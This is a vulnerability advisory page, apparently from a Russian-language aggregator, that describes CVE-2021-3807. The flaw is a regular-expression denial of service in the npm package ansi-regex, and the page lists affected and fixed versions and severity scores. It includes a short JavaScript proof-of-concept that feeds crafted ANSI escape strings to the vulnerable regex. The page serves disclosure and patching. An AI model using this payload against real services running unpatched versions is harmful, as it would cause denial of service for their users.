Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-93q8-gq69-wqmw

Опубликовано: 20 сент. 2021
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

Inefficient Regular Expression Complexity in chalk/ansi-regex

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex'; for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = "\u001B["+";".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") }

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

Ссылки

Пакеты

Наименование

ansi-regex

npm
Затронутые версииВерсия исправления

>= 6.0.0, < 6.0.1

6.0.1

Наименование

ansi-regex

npm
Затронутые версииВерсия исправления

>= 5.0.0, < 5.0.1

5.0.1

Наименование

ansi-regex

npm
Затронутые версииВерсия исправления

>= 4.0.0, < 4.1.1

4.1.1

Наименование

ansi-regex

npm
Затронутые версииВерсия исправления

>= 3.0.0, < 3.0.1

3.0.1

EPSS

Процентиль: 42%
0.00198
Низкий

7.5 High

CVSS3

CVE ID

CVE-2021-3807

Дефекты

CWE-1333
CWE-697

Связанные уязвимости

ubuntu логотип

CVE-2021-3807

CVSS3: 7.5
ubuntu
почти 4 года назад

ansi-regex is vulnerable to Inefficient Regular Expression Complexity

redhat логотип

CVE-2021-3807

CVSS3: 7.5
redhat
почти 4 года назад

ansi-regex is vulnerable to Inefficient Regular Expression Complexity

nvd логотип

CVE-2021-3807

CVSS3: 7.5
nvd
почти 4 года назад

ansi-regex is vulnerable to Inefficient Regular Expression Complexity

debian логотип

CVE-2021-3807

CVSS3: 7.5
debian
почти 4 года назад

ansi-regex is vulnerable to Inefficient Regular Expression Complexity

fstec логотип

BDU:2022-00256

CVSS3: 7.5
fstec
почти 4 года назад

Уязвимость библиотеки сравнения с регулярными выражениями ANSI escape-кодов Ansi-regex, связанная с неконтролируемым расходом ресурсов, позволяющая нарушителю вызвать отказ в обслуживании

EPSS

Процентиль: 42%
0.00198
Низкий

7.5 High

CVSS3

CVE ID

CVE-2021-3807

Дефекты

CWE-1333
CWE-697